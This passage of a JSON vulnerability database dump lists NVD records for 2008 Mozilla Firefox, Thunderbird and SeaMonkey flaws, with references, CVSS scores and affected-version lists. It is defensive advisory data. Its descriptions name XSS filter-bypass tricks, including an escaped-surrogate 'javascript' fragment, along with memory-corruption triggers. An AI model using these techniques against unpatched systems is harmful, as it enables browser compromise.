"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-43.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "Mozilla Firefox 2.0.0.14, and other versions before 2.0.0.17, allows remote attackers to bypass cross-site scripting (XSS) protection mechanisms and conduct XSS attacks via HTML-escaped low surrogate characters that are ignored by the HTML parser, as demonstrated by a \"jav�ascript\" sequence, aka \"HTML escaped low surrogates bug.\"", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4066", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:06", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8880", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8880"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4066"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8880", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:8880"}], "modified": "2017-09-28T21:31:58", "cpe": ["cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:2.0.0.16"], "id": "CVE-2008-4066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4066", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-29T14:26:06", "references": ["http://www.debian.org/security/2008/dsa-1669", "http://www.securityfocus.com/bid/31346", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.securitytracker.com/id?1020923", "http://www.mozilla.org/security/announce/2008/mfsa2008-45.html", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "http://www.blackhat.com/presentations/bh-usa-08/Hoffman/Hoffman-BH2008-CircumventingJavaScript.ppt", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "https://bugzilla.mozilla.org/show_bug.cgi?id=449703", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45361", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "The XBM decoder in Mozilla Firefox before 2.0.0.17 and SeaMonkey before 1.1.12 allows remote attackers to read uninitialized memory, and possibly obtain sensitive information in opportunistic circumstances, via a crafted XBM image file.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4069", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:06", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11000", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11000"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4069"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11000", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11000"}], "modified": "2017-09-28T21:31:58", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:firefox:0.9.3"], "id": "CVE-2008-4069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4069", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-29T14:26:06", "references": ["http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mozilla.org/security/announce/2008/mfsa2008-46.html", "https://bugzilla.mozilla.org/show_bug.cgi?id=425152", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.securityfocus.com/bid/31411", "http://www.debian.org/security/2009/dsa-1696", "http://www.debian.org/security/2009/dsa-1697", "http://www.securitytracker.com/id?1020948", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45426", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "Heap-based buffer overflow in Mozilla Thunderbird before 2.0.0.17 and SeaMonkey before 1.1.12 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a long header in a news article, related to \"canceling [a] newsgroup message\" and \"cancelled newsgroup messages.\"", "edition": 3, "reporter": "NVD", "published": "2008-09-27T06:30:03", "title": "CVE-2008-4070", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:06", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10933", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10933"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4070"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10933", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10933"}], "modified": "2017-09-28T21:31:58", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:thunderbird:2.0.0.7", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-4070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4070", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:06", "references": ["http://www.debian.org/security/2008/dsa-1669", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45356", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.securitytracker.com/id?1020920", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01335.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "https://bugzilla.mozilla.org/show_bug.cgi?id=430740", "http://www.redhat.com/support/errata/RHSA-2008-0879.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-43.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allow remote attackers to bypass cross-site scripting (XSS) protection mechanisms and conduct XSS attacks via byte order mark (BOM) characters that are removed from JavaScript code before execution, aka \"Stripped BOM characters bug.\"", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4065", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:06", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11383", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11383"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4065"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11383", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11383"}], "modified": "2017-09-28T21:31:58", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:2.0_.13", "cpe:/a:mozilla:thunderbird:2.0_.14", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:thunderbird:2.0_.12", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:2.0_.4", "cpe:/a:mozilla:firefox:1.5.0.11", "cpe:/a:mozilla:thunderbird:1.0.5", "cpe:/a:mozilla:thunderbird:1.0.6", "cpe:/a:mozilla:thunderbird:1.5.0.8", "cpe:/a:mozilla:firefox:1.5.0.6", "cpe:/a:mozilla:thunderbird:2.0.0.1", "cpe:/a:mozilla:firefox:1.5", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:firefox:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.4", "cpe:/a:mozilla:thunderbird:1.5", "cpe:/a:mozilla:firefox:0.9:rc", "cpe:/a:mozilla:thunderbird:2.0.0.0", "cpe:/a:mozilla:firefox:0.9_rc", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:1.5.3", "cpe:/a:mozilla:thunderbird:1.0.2", "cpe:/a:mozilla:thunderbird:2.0_8", "cpe:/a:mozilla:thunderbird:2.0_.6", "cpe:/a:mozilla:thunderbird:0.5", "cpe:/a:mozilla:firefox:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:0.9", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0:beta", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:thunderbird:1.5.1", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:thunderbird:1.0.7", "cpe:/a:mozilla:firefox:2.0.0.16", "cpe:/a:mozilla:thunderbird:0.2", "cpe:/a:mozilla:seamonkey", "cpe:/a:mozilla:thunderbird:2.0.0.16", "cpe:/a:mozilla:thunderbird:1.5.0.11", "cpe:/a:mozilla:thunderbird:0.1", "cpe:/a:mozilla:firefox:2.0.0.11", "cpe:/a:mozilla:thunderbird:2.0.0.14", "cpe:/a:mozilla:thunderbird:1.5.0.7", "cpe:/a:mozilla:thunderbird:2.0_.5", "cpe:/a:mozilla:thunderbird:0.9", "cpe:/a:mozilla:firefox:0.9.3", "cpe:/a:mozilla:thunderbird:2.0.0.15", "cpe:/a:mozilla:thunderbird:2.0.0.8", "cpe:/a:mozilla:thunderbird:1.7.3", "cpe:/a:mozilla:thunderbird:2.0_.9", "cpe:/a:mozilla:thunderbird:1.0.3", "cpe:/a:mozilla:thunderbird:0.3", "cpe:/a:mozilla:thunderbird:2.0.0.6"], "id": "CVE-2008-4065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4065", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-29T14:26:05", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=443089", "http://www.debian.org/security/2008/dsa-1669", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.412123", "http://www.securityfocus.com/bid/31346", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:206", "http://www.vupen.com/english/advisories/2009/0977", "http://www.mandriva.com/security/advisories?name=MDVSA-2008:205", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45351", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.379422", "http://www.vupen.com/english/advisories/2008/2661", "http://www.redhat.com/support/errata/RHSA-2008-0882.html", "http://www.debian.org/security/2008/dsa-1649", "http://www.debian.org/security/2009/dsa-1696", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01335.html", "http://www.ubuntu.com/usn/usn-645-2", "http://www.debian.org/security/2009/dsa-1697", "http://slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.405232", "http://www.redhat.com/support/errata/RHSA-2008-0908.html", "http://www.ubuntu.com/usn/usn-647-1", "http://www.ubuntu.com/usn/usn-645-1", "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "http://download.novell.com/Download?buildid=WZXONb-tqBw~", "http://www.redhat.com/support/errata/RHSA-2008-0879.html", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html", "http://www.securitytracker.com/id?1020916", "http://www.mozilla.org/security/announce/2008/mfsa2008-42.html", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-256408-1"], "description": "Integer overflow in the MathML component in Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via an mtd element with a large integer value in the rowspan attribute, related to the layout engine.", "edition": 3, "reporter": "NVD", "published": "2008-09-24T16:37:04", "title": "CVE-2008-4061", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:05", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10794", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10794"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-4061"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10794", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10794"}], "modified": "2017-09-28T21:31:57", "cpe": ["cpe:/a:mozilla:thunderbird:2.0.0.11", "cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:thunderbird:1.5.0.10", "cpe:/a:mozilla:thunderbird:2.0_.13", "cpe:/a:mozilla:thunderbird:2.0_.14", "cpe:/a:mozilla:firefox:1.5.0.3", "cpe:/a:mozilla:thunderbird:1.5.0.3", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:thunderbird:2.0.0.9", "cpe:/a:mozilla:firefox:1.5.0.2", "cpe:/a:mozilla:firefox:2.0.0.14", "cpe:/a:mozilla:thunderbird:0.7", "cpe:/a:mozilla:firefox:1.5.1", "cpe:/a:mozilla:firefox:1.5.4", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:thunderbird:1.5:beta2", "cpe:/a:mozilla:firefox:2.0.0.13", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:seamonkey:1.0::dev", "cpe:/a:mozilla:thunderbird:1.0.8", "cpe:/a:mozilla:firefox:1.5.0.1", "cpe:/a:mozilla:firefox:2.0.0.12", "cpe:/a:mozilla:firefox:0.8", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:1.5.7", "cpe:/a:mozilla:thunderbird:1.0.4", "cpe:/a:mozilla:firefox:1.0.5", "cpe:/a:mozilla:thunderbird", "cpe:/a:mozilla:thunderbird:2.0.0.12", "cpe:/a:mozilla:thunderbird:1.5.0.2", "cpe:/a:mozilla:thunderbird:1.7.1", "cpe:/a:mozilla:thunderbird:1.5.0.9", "cpe:/a:mozilla:firefox:0.10.1", "cpe:/a:mozilla:firefox:2.0", "cpe:/a:mozilla:thunderbird:1.5.0.4", "cpe:/a:mozilla:firefox:1.0", "cpe:/a:mozilla:firefox:1.5:beta1", "cpe:/a:mozilla:firefox:1.0.3", "cpe:/a:mozilla:firefox:2.0.0.10", "cpe:/a:mozilla:thunderbird:1.5.0.6", "cpe:/a:mozilla:thunderbird:1.0", "cpe:/a:mozilla:firefox:1.8", "cpe:/a:mozilla:firefox:1.5.0.5", "cpe:/a:mozilla:firefox:1.5.0.12", "cpe:/a:mozilla:thunderbird:1.0.1", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:thunderbird:1.5.2", "cpe:/a:mozilla:thunderbird:1.5.0.1", "cpe:/a:mozilla:firefox:0.9.2", "cpe:/a:mozilla:firefox:1.5.6", "cpe:/a:mozilla:firefox:1.5:beta2", "cpe:/a:mozilla:firefox:1.0.4", "cpe:/a:mozilla:thunderbird:0.4", "cpe:/a:mozilla:firefox:1.0.7", "cpe:/a:mozilla:thunderbird:2.0_.12", "cpe:/a:mozilla:firefox:1.0.6", "cpe:/a:mozilla:thunderbird:0.7.2", "cpe:/a:mozilla:firefox:1.0.1", "cpe:/a:mozilla:thunderbird:0.6", "cpe:/a:mozilla:firefox:2.0.0.15", "cpe:/a:mozilla:firefox:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.0::alpha", "cpe:/a:mozilla:thunderbird:2.0.0.2", "cpe:/a:mozilla:thunderbird:0.8", "cpe:/a:mozilla:firefox:1.0.2", "cpe:/a:mozilla:thunderbird:2.0.0.5", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:firefox:1.5.8", "cpe:/a:mozilla:thunderbird:2.0.0.13", "cpe:/a:mozilla:firefox:0.10", "cpe:/a:mozilla:firefox:0.9.1", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:0.7.1", "cpe:/a:mozilla:firefox:1.5.5", "cpe:/a:mozilla:thunderbird:1.0.5:beta", "cpe:/a:mozilla:firefox:1.5.0.4", "cpe:/a:mozilla:firefox:2.0.0.1", "cpe:/a:mozilla:firefox:1.5.0.9", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:thunderbird:2.0.0.3", "cpe:/a:mozilla:firefox:1.5.2", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:thunderbird:0.7.3", "cpe:/a:mozilla:thunderbird:2.0_.4", "cpe:/a:mozilla:firefox:1.5.0.11", 